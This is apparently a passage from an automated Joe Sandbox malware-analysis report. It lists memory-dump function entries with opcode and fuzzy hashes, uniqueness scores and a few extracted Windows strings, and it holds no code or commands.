                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: EXT-
                                          • API String ID: 0-1948896318
                                          • Opcode ID: a06456944d9cea9fbade4cefc5282c9b517821b301c49f667bc0d614f6062a4b
                                          • Instruction ID: 5b2465748deac3ad71c0518a0f33d44a2947d78d62fbff2a16f0449d1349bf3d
                                          • Opcode Fuzzy Hash: a06456944d9cea9fbade4cefc5282c9b517821b301c49f667bc0d614f6062a4b
                                          • Instruction Fuzzy Hash: 4241A1729083159BD720DA74C841BAFB7E8AF88B24F04092DF994E71C1EB78DD04E796
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: d5a8ceecd2a7a99df1e125e224f2cef7630ef40b4840cae08ef54c1d097273a0
                                          • Instruction ID: 88d5fa272dcf2b2e743a85ecf4da3aaf3f1a61fb7cd969767ea949127ff1e3fa
                                          • Opcode Fuzzy Hash: d5a8ceecd2a7a99df1e125e224f2cef7630ef40b4840cae08ef54c1d097273a0
                                          • Instruction Fuzzy Hash: 704162B1D0052CAAEF21DA60CC85FDEB77CAB44754F0045A5EA08AB181DB749E899FE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TrustedInstaller
                                          • API String ID: 0-565535830
                                          • Opcode ID: 1e9afb51d304ed865905f784be35817e701c32b2b16518142bf5e7ae3f4afdfa
                                          • Instruction ID: a661fae5b89796a3991df6c16cf2d73180d2d1fffe26976a65851980b4f3f0f3
                                          • Opcode Fuzzy Hash: 1e9afb51d304ed865905f784be35817e701c32b2b16518142bf5e7ae3f4afdfa
                                          • Instruction Fuzzy Hash: 61318132940619BFEF22AB94CC51FEEBB79EB44750F010066FA10AB151D6789E41EBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          • Opcode ID: f6cccf98b1166527f6d0a8f9127843f06d7f87cef479376ca325f16a5c99736e
                                          • Instruction ID: cbf004dc6da5d7f614fa67249dc6bea00686d24775a2304eb1d808dafc75739c
                                          • Opcode Fuzzy Hash: f6cccf98b1166527f6d0a8f9127843f06d7f87cef479376ca325f16a5c99736e
                                          • Instruction Fuzzy Hash: 16311671A007189ADB21DB6ACC51BEE7BB8DF45715F104028E981EB282CB7DEC05EF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: d3aea4e2cdf1f57cce0292193330dde15f13511f93cd87b7bc75357450a7d7f1
                                          • Instruction ID: 292aeaf3b047f8b278fcf777931064eb12a652c33d8fc2258e6798d8b4a46171
                                          • Opcode Fuzzy Hash: d3aea4e2cdf1f57cce0292193330dde15f13511f93cd87b7bc75357450a7d7f1
                                          • Instruction Fuzzy Hash: 5631DD76D00619AFEF15DE58C856E6FBBB4EBC0760F114129A805A7291D730AE04EBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: WindowsExcludedProcs
                                          • API String ID: 0-3583428290
                                          • Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                          • Instruction ID: 1521ccecba9f8723e9ee5e249745942c4886f2f735f0e4cd3e12f8dde31f584c
                                          • Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                          • Instruction Fuzzy Hash: 06210737D02525ABDB229A55C844F9F7BBDAF51BE0F154022BD059B194CA34DD02B7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 00FA895E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                          • API String ID: 0-702105204
                                          • Opcode ID: 4da55156b0c67918853285f6e1eabc6708ca9edc50c737c7601581573a4eec7a
                                          • Instruction ID: 7c7c73ef01ee376166e9e9077e99acf1ea84c64bc41079a5b52ecb2da3646091
                                          • Opcode Fuzzy Hash: 4da55156b0c67918853285f6e1eabc6708ca9edc50c737c7601581573a4eec7a
                                          • Instruction Fuzzy Hash: A701F7B26102109BD6206A55DC85AB77B65EFCFBE0F140028F5810A556CFADAC83F792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e7e8924f69322beabe2845bb7665250a82a403f563212d0c3df7798fb136f83d
                                          • Instruction ID: bf3ef408b5cb2ad72f15f07586e92b895222a7d47b2bde15482459747b11e745
                                          • Opcode Fuzzy Hash: e7e8924f69322beabe2845bb7665250a82a403f563212d0c3df7798fb136f83d
                                          • Instruction Fuzzy Hash: 5442D432A083428BD765CF68C992F6BB7E5EF88710F18092EF98197290D774DC45EB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ee902c0c0ed8ca5b7a536a46805a76151b2b8a5104e633bb94bac3f3b4a5de2
                                          • Instruction ID: a7fb2276252714f730bfaeeac5de7a37ff2ae4dba35f8db517244a0527eeed13
                                          • Opcode Fuzzy Hash: 0ee902c0c0ed8ca5b7a536a46805a76151b2b8a5104e633bb94bac3f3b4a5de2
                                          • Instruction Fuzzy Hash: D8423C75E002198FDB24CF69C881BEDB7F9BF88750F188199E849AB241DB349D86DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dcda80f1c65c08e7d8314ec67cb213b5905094096402bb5d3d0eca174b5ae624
                                          • Instruction ID: d3135c6f35651d53f07580cea01e603eecb2c16781edeb3853c3ae1067fcbff4
                                          • Opcode Fuzzy Hash: dcda80f1c65c08e7d8314ec67cb213b5905094096402bb5d3d0eca174b5ae624
                                          • Instruction Fuzzy Hash: 5432CF70A007558FDB24EF69C8457BEBBF2BF84314F24411DE48ADB285DB39A842EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a500fead3dbae41c28a66e93b41cdb6cf8384d3782a8adb481536ade2182f3b2
                                          • Instruction ID: dd0121fd393d071cd85001eb57f75175cc8db42920a9dab80642e2b9896fd48e
                                          • Opcode Fuzzy Hash: a500fead3dbae41c28a66e93b41cdb6cf8384d3782a8adb481536ade2182f3b2
                                          • Instruction Fuzzy Hash: F722F471A0465A8BD724CF29C252B72B7F1BF44318F18849DD8968F285D335F852FB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 511cb88c68fd71d12a6e4f3747d57b6296cee12241aa6db19df8e75f27514aac
                                          • Instruction ID: 7fe589d92fb26f38e77f0fa8af9871a78aeef7544132ff31cfd809e22c56dfb3
                                          • Opcode Fuzzy Hash: 511cb88c68fd71d12a6e4f3747d57b6296cee12241aa6db19df8e75f27514aac
                                          • Instruction Fuzzy Hash: 95327B71A05618CFCB24DFA8D880BAAB7F5FF48310F248669E955EB391D734AC41EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                          • Instruction ID: 8fdf35345198f63d90869c8523650536940b1f5bf5a247da2ee87ceccab1cd17
                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                          • Instruction Fuzzy Hash: 6BF14B71E0161A9BDB14DF95C980BAEBBB5BF48714F088129ED05BB241E774EC42EB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b72d520a3dbed15565c9bbf375b2e4cc5f8b3cac8dc7310716afcadad7b1ccbc
                                          • Instruction ID: 17ef0a30416f9a6daf164b2805d81266183ae9d339ed7bc3384971a57eeefa86
                                          • Opcode Fuzzy Hash: b72d520a3dbed15565c9bbf375b2e4cc5f8b3cac8dc7310716afcadad7b1ccbc
                                          • Instruction Fuzzy Hash: C5D1D471E006199BDF04CF6AC841BFEB7B9AFC8354F18816AD455E7280DB39A906DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe96676950fcbb7199092e3daed0f4b9a5bfd9a0be83452b6d74c8b2e543ea70
                                          • Instruction ID: aa4e7f2c5e888e480d5618548dff45b3441956998116be61db89fc936c1b1fa6
                                          • Opcode Fuzzy Hash: fe96676950fcbb7199092e3daed0f4b9a5bfd9a0be83452b6d74c8b2e543ea70
                                          • Instruction Fuzzy Hash: 33E19A71908351CFC714CF28D490A6ABBE0FF99328F148A6DE899CB351DB31E945DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e99508090b19b35cb6068b2b7a1a5b346a5a0dcd4eede8ec46f2a50fffc0a8f
                                          • Instruction ID: 422e3d0d11ec92048d2422a117b8181b115852fb283baef5c4c27ee8312bd077
                                          • Opcode Fuzzy Hash: 4e99508090b19b35cb6068b2b7a1a5b346a5a0dcd4eede8ec46f2a50fffc0a8f
                                          • Instruction Fuzzy Hash: 48D1E172A002169BCB14CF24CD91BFA73A5BF55364F14822AF916DB2C1EF34D982EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                          • Instruction ID: 268499af5b40383fc6ce5bf275e7cfc8cec2420d1b6686e1d56d7e0b38362aed
                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                          • Instruction Fuzzy Hash: D9B180B4E00604AFDF24DB94C940BABBBB9AF85394F144429A94297791DEB4ED06EB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                          • Instruction ID: 372293ac644976d27a682b0a0f0e1faefb4a52435e43f942ffcae46630e9dd14
                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                          • Instruction Fuzzy Hash: 48B1F731A04646AFDB15DB68C851BBEBBF6AF44320F18016AE552D7381DB34ED41FB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12f4b017f720f77a9b8f8fee2377e8bd1cc31e8067a01e1669818632dcbd6010
                                          • Instruction ID: 380145dbcb6636046859feef384dd462ee11988eb11c31ce30c9e0a744582dfd
                                          • Opcode Fuzzy Hash: 12f4b017f720f77a9b8f8fee2377e8bd1cc31e8067a01e1669818632dcbd6010
                                          • Instruction Fuzzy Hash: 52C178716083408FD760DF14C495BABB7E8FF88354F44492DE98987290DB78E909DF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f040e72387896fb421f48aab9e267ed8377a262c6e84e743c8ff39b85d35cc9b
                                          • Instruction ID: f385a3bcdde2b4b7c51900a9ceb77c94942a0d9d5f57fa5ceb9512530172ac34
                                          • Opcode Fuzzy Hash: f040e72387896fb421f48aab9e267ed8377a262c6e84e743c8ff39b85d35cc9b
                                          • Instruction Fuzzy Hash: AFB17170A402658BDB24DF54C890BEDB3B2EF84710F1585EAD40AE7281EB74ADC5EF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 16aee5d41ea9141b87aa70c09b68d52fa498d7a91f37a19fee3144253f991014
                                          • Instruction ID: 775e5b692b16d26d71c723face14f6c5c15f524b0aeb91bc2cc3d21da5b9364d
                                          • Opcode Fuzzy Hash: 16aee5d41ea9141b87aa70c09b68d52fa498d7a91f37a19fee3144253f991014
                                          • Instruction Fuzzy Hash: A8A10532E006189FDB21EB98CC44BEEBBA4BF41724F150165ED50AB2D1D77C9E44EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f68dd8d220dade0bbf1a3f77eb584ed8a6fb8e7f77aed8d2912d5e4c43f76cc
                                          • Instruction ID: 3b7ade75dbf16d62d00362052f349da881c32379923e5408309265102a1b0194
                                          • Opcode Fuzzy Hash: 0f68dd8d220dade0bbf1a3f77eb584ed8a6fb8e7f77aed8d2912d5e4c43f76cc
                                          • Instruction Fuzzy Hash: ADA1D171B016169BEB24CF69C991BBAB7B1FF54324F204029EA45D7281EF78EC11EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea8d40e489fd97c9bd935e347e52a7664256c8c398b24ea4d79574e656816693
                                          • Instruction ID: 7cfa6419239856616eb84795d803cd7d325b820d1bdae6aa1d3a5411f698e768
                                          • Opcode Fuzzy Hash: ea8d40e489fd97c9bd935e347e52a7664256c8c398b24ea4d79574e656816693
                                          • Instruction Fuzzy Hash: 90A1CB72A04615AFC721EF18CD80B6AB7E9FF48764F050928F6859B261C738FD00EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b993b224bfa87e0a4a92ab1cd4cb5d7dc4aa3ea3071496b82acc338aae623b4
                                          • Instruction ID: 2bc2d0e212566321ffd64824ed1a580e0dcf69240d337d774264ee91971ad6ac
                                          • Opcode Fuzzy Hash: 9b993b224bfa87e0a4a92ab1cd4cb5d7dc4aa3ea3071496b82acc338aae623b4
                                          • Instruction Fuzzy Hash: 3F91B1B1D00215AFDF15CFA8DC91BAEBBB5AF49710F194169E510EB341D738ED01ABA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e63399d85737c01c7513eb16015f82e3fca90b976edd3a709dfd984177e19e05
                                          • Instruction ID: 88df0f77a8c80cc1866eeac99a8aba20210fe00379af4cdf1bf267d0186f83d9
                                          • Opcode Fuzzy Hash: e63399d85737c01c7513eb16015f82e3fca90b976edd3a709dfd984177e19e05
                                          • Instruction Fuzzy Hash: DD911336E046159BDB24EB58C840BBEB7A2EF88734F194069EC45DB2C1E778DD01EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0026f90948e904b57795e44a2c5de243a75d639853ff09f79f8054685bda86b8
                                          • Instruction ID: a1b816615e56c8dd2f7486170970e4a98566bfa6372ae22a4a7e2b601f762366
                                          • Opcode Fuzzy Hash: 0026f90948e904b57795e44a2c5de243a75d639853ff09f79f8054685bda86b8
                                          • Instruction Fuzzy Hash: D68194B1E006159FDB24CF69C940ABEB7F9FB48710F14852EE459E7640E734E940DB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                          • Instruction ID: e55a6290edb1fb660ba2574d1bed758bd78b2b4b49e5de481051361aaf9ced2f
                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                          • Instruction Fuzzy Hash: D6819331A002499FCF18DF9AC880AAEB7F2FF84310F148569E8169B345DB74ED01EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd361f2ee8c89ea69c00e1a1902a178d6055b7d524934d792518b19501e97ad0
                                          • Instruction ID: 8ffd08a58125c4840cbf5ab449da35676ce98a7c12ad5a9825bbe78eba72f095
                                          • Opcode Fuzzy Hash: cd361f2ee8c89ea69c00e1a1902a178d6055b7d524934d792518b19501e97ad0
                                          • Instruction Fuzzy Hash: 30816F71A00609EFDB25CFA9C880BEEBBBAFF48354F10442DE555A7250D770AD49EB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 479fd3d51c170de114127dbd17e67c9688796b56951084267c580d5e1c1b7e0b
                                          • Instruction ID: 46881b435a5f77897af4a468f2b7c16ebbefd061f7ed63e84bfde06d7489be4f
                                          • Opcode Fuzzy Hash: 479fd3d51c170de114127dbd17e67c9688796b56951084267c580d5e1c1b7e0b
                                          • Instruction Fuzzy Hash: 6571CE76D00625DBCB259F58C8907FEBBB5FF58760F24411AE842AB390D7799801EBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1adf3b6ed440ded0890237567a96e974a8f8df4459751894b6ea07d69e674e4e
                                          • Instruction ID: 8c365815e21032d04e840dd755d9ad1f6577a0c483055e94443107fd35e5412f
                                          • Opcode Fuzzy Hash: 1adf3b6ed440ded0890237567a96e974a8f8df4459751894b6ea07d69e674e4e
                                          • Instruction Fuzzy Hash: CE71E471A046418FC351DF28C881B6AB7E5FF84320F1485AAF899CB352DB38DC45EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d13f276e69e6cfea5f7b5f487ec6d760271a1c5b0a7e45645d17a40a08962aa3
                                          • Instruction ID: 58105c416d68aebe09e493bf1f30d3eac7cc40dd08a7eb02dda92c11d798aa69
                                          • Opcode Fuzzy Hash: d13f276e69e6cfea5f7b5f487ec6d760271a1c5b0a7e45645d17a40a08962aa3
                                          • Instruction Fuzzy Hash: 7D71DE32600A01EFDB21DF16CC45F9AB7E5EB44760F244828E256CB6A1D77DE944EF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                          • Instruction ID: 7f5bc1ce651b9530cdf30588a922c08f1673daa0de0eb637b2dd225b0d8bfbfd
                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                          • Instruction Fuzzy Hash: 3C719CB1E00609AFCB10DFA9D985EEEBBB9FF48310F144469E505E7251DB38EA01DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bef85f190eeee9263711cf06866e6890d6c6e83da97d389c7f26692b8429dce9
                                          • Instruction ID: 9c174a3d35a5020ff9b11791ca0653dcf7fa647b6d9f457bc64c2344d0ab68cc
                                          • Opcode Fuzzy Hash: bef85f190eeee9263711cf06866e6890d6c6e83da97d389c7f26692b8429dce9
                                          • Instruction Fuzzy Hash: 7F81A072A053158FDB24DF98E584BADB7B1BF88320F15412DD800AB395DB79AD41EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
